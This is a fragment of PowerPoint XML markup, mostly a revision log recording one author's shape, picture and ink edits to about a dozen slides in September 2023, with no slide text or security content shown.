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3" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="274" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="266" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="271" r:id="rId13"/>
    <p:sldId id="269" r:id="rId14"/>
    <p:sldId id="261" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="260" r:id="rId17"/>
    <p:sldId id="275" r:id="rId18"/>
    <p:sldId id="268" r:id="rId19"/>
    <p:sldId id="262"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B5"/>
    <a:srgbClr val="E3116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1989C-53CF-41F2-9D05-A6DF9CACECAC}" v="111" dt="2023-09-13T14:10:54.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11" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98" d="100"/>
        </p:scale>
        <p:origin x="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4781989C-53CF-41F2-9D05-A6DF9CACECAC}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T15:05:42.110" v="4967" actId="14100"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T00:36:21.751" v="69" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T00:36:21.751" v="69" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:32:04.619" v="3936" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2201572609" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T00:38:18.101" v="74" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2201572609" sldId="257"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:32:04.619" v="3936" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2201572609" sldId="257"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T13:23:06.236" v="576" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="450669007" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T00:52:01.412" v="164" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669007" sldId="258"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T13:23:06.236" v="576" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669007" sldId="258"/>
            <ac:spMk id="6" creationId="{112844C9-97ED-8287-C1FE-0533ACEB4D57}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T01:04:00.919" v="226" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669007" sldId="258"/>
            <ac:picMk id="3" creationId="{F913C573-F294-1000-656D-48C006A63D7F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T01:11:17" v="280" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669007" sldId="258"/>
            <ac:picMk id="8" creationId="{DFEE711C-E350-C917-4D7D-4C1AD3CDD8CE}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T14:42:36.984" v="585" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3429415671" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T14:42:36.984" v="585" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3429415671" sldId="259"/>
            <ac:spMk id="6" creationId="{4189D694-2BB2-30A9-F911-C341AB2D283B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T01:56:12.563" v="371" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3429415671" sldId="259"/>
            <ac:picMk id="3" creationId="{F2830658-D911-7E0D-EC7B-7AD0F78741AF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T02:05:47.087" v="373"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3429415671" sldId="259"/>
            <ac:picMk id="5" creationId="{49CBF319-B296-6B10-9253-B45C264977D3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T21:01:56.482" v="4389" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4190569356" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T21:01:56.482" v="4389" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190569356" sldId="260"/>
            <ac:spMk id="3" creationId="{25BDA276-60B9-0528-B5DF-5AB00142DA0A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T21:00:11.576" v="4375" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190569356" sldId="260"/>
            <ac:picMk id="2" creationId="{01CB6A31-098F-0147-5072-D1CD409A82B1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:24:43.756" v="3729" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1557082237" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:24:07.953" v="3720" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:spMk id="2" creationId="{8D9926A0-03BF-4D5F-8529-DF8AAAB6E007}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T15:28:09.847" v="2396" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:spMk id="3" creationId="{1B053F55-BE90-DC80-CA1E-5339E65959B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:24:43.756" v="3729" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:spMk id="10" creationId="{D4D68565-41A7-E4F3-F85C-6AC672051F50}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T20:31:02.711" v="1197" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:spMk id="14" creationId="{BA450E52-C3C5-74D3-D194-B4F10BF6CCC1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T20:28:49.609" v="1182" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:picMk id="5" creationId="{DAB01823-D7F6-7945-7A1B-78960BF4AB0E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T15:42:41.431" v="923" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:picMk id="7" creationId="{C55EA1EF-EA4A-A76A-FEDC-10E9CD767672}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T15:42:41.431" v="923" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:picMk id="8" creationId="{3B5B821C-F66A-4CD4-8DF1-9A75002DD0C7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T15:42:41.431" v="923" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:cxnSpMk id="12" creationId="{FB70DBF6-5B54-0726-C629-030C323CF3CA}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:11:42.199" v="4818" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3952469874" sldId="262"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T01:00:49.111" v="4532" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3952469874" sldId="262"/>
            <ac:picMk id="3" creationId="{61752F05-E1AB-748F-21A6-FD9C60257DEE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:10:36.775" v="4808" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3952469874" sldId="262"/>
            <ac:inkMk id="2" creationId="{30006D81-3BE6-2249-F5F6-B820B45F8D28}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T14:11:42.199" v="4818" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3952469874" sldId="262"/>
            <ac:inkMk id="4" creationId="{E947B827-B9F8-B114-E223-17A0BEBC3402}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:47:07.222" v="4149" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2849589159" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:43:38.077" v="4077" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="2" creationId="{37D69293-E137-0A01-E1AD-5234103E8FF7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T23:56:35.537" v="1324" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="3" creationId="{37F0A203-6F68-BB81-4426-1310384A8C2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:44:05.559" v="4085" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="4" creationId="{2C000124-0A4A-3953-703C-F901995A3295}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T23:57:47.883" v="1337" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="7" creationId="{AC91129B-96CD-E554-D17B-B71F52A12512}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:01:18.824" v="1390" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="9" creationId="{FF81415C-93D2-5F92-5589-7CFF4094975E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:47:07.222" v="4149" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="10" creationId="{427BCB36-41E6-D162-26DF-F5C037725048}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:30:16.915" v="1540" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:picMk id="5" creationId="{6FB37CCD-6E90-7783-C8C6-E034B36553B9}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T15:02:38.447" v="4820" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4133766529" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T23:20:19.966" v="1255" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4133766529" sldId="264"/>
            <ac:spMk id="2" creationId="{167CF2C6-D80C-365F-B54A-1A529918F9B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T15:02:38.447" v="4820" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4133766529" sldId="264"/>
            <ac:spMk id="3" creationId="{4AE1FA33-B3D2-B69A-DB10-F54E057FA68E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:26:26.984" v="1536" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2420996426" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:05:48.743" v="1449" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="2" creationId="{44C4768B-759A-9D3C-D1F3-BB0A691957E5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:05:48.743" v="1449" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="3" creationId="{AB1AF85F-92F0-02BD-2D03-685F6ACE5355}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:06:55.155" v="1454"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="6" creationId="{C7558866-6F08-3E00-07F5-E8E221372727}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:07:19.117" v="1460"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="7" creationId="{C3DC7FCE-3972-2537-D9B9-647631447630}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:26:26.984" v="1536" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="8" creationId="{1F044EA3-0EAE-EC28-6AE2-70DFE343B998}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:12:07.291" v="1531" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:picMk id="5" creationId="{BB7FEC85-B02B-3294-E60C-5B02374BF9F3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:26:26.984" v="1536" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:picMk id="10" creationId="{9B3DF655-296B-8F88-9417-5125AA454FD7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T15:05:42.110" v="4967" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="788267696" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T13:23:20.775" v="2027" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:spMk id="2" creationId="{2C9CBFBF-7FF3-DE6F-997C-CB83B7387D2B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T23:00:43.581" v="2515" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:spMk id="3" creationId="{344BDF9A-0274-11B6-8027-D63DAF13427D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:41:47.061" v="1555" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:spMk id="3" creationId="{36CFE9D9-A799-F202-CDD2-35B3FFE90EEF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T23:00:31.537" v="2514" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:spMk id="5" creationId="{2B9FB1A1-005D-5713-EA00-4209B5DE9C14}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T15:02:53.689" v="4821" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:spMk id="6" creationId="{E329FA93-93AB-4D93-F06B-500F86381120}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T23:01:25.439" v="2527" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:spMk id="9" creationId="{B0DD0395-EBDC-6C9E-D5BE-39ABBCC5BA31}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T15:05:42.110" v="4967" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
